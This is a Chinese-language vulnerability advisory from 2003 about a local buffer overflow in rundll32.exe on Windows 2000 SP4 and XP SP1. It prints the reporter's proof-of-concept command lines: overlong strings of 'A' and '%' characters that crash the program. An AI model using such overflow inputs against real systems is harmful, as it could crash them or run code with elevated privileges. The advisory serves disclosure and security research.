Microsoft rundll32.exe本地缓冲区溢出漏洞
发布日期:2003-07-06
更新日期:2003-07-11
受影响系统:Microsoft Windows 2000 Server SP4
Microsoft Windows 2000 Professional SP4
Microsoft Windows 2000 Datacenter Server SP4
Microsoft Windows 2000 Advanced Server SP4
Microsoft Windows XP Professional SP1
Microsoft Windows XP Home SP1
描述:
BUGTRAQ ID:
8114
Microsoft Windows是微软开发的视窗操作系统。
Microsoft Windows 包含的rundll32.exe对用户提交的参数缺少充分检查,本地攻击者可以利用这个漏洞进行缓冲区溢出攻击。
当超长字符串作为参数提交给rundll32.exe执行时,会发生溢出,可能以高权限在系统上执行任意指令。
<*来源:Rick Patel (
rikul@bellsouth.net)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105770180515783&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Rick Patel (
rikul@bellsouth.net)提供了如下测试方法:
rundll32.exe advpack32.dll,<'A'x499>
在采用SP4补丁的系统中,下面的方法可以导致溢出:
C:\WINNT\system32>rundll32.exe
rundll32.exe,AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAA%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%% <-- crashes 0x00250025...
建议:
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/technet/security/浏览次数:4089
严重程度:20(网友投票)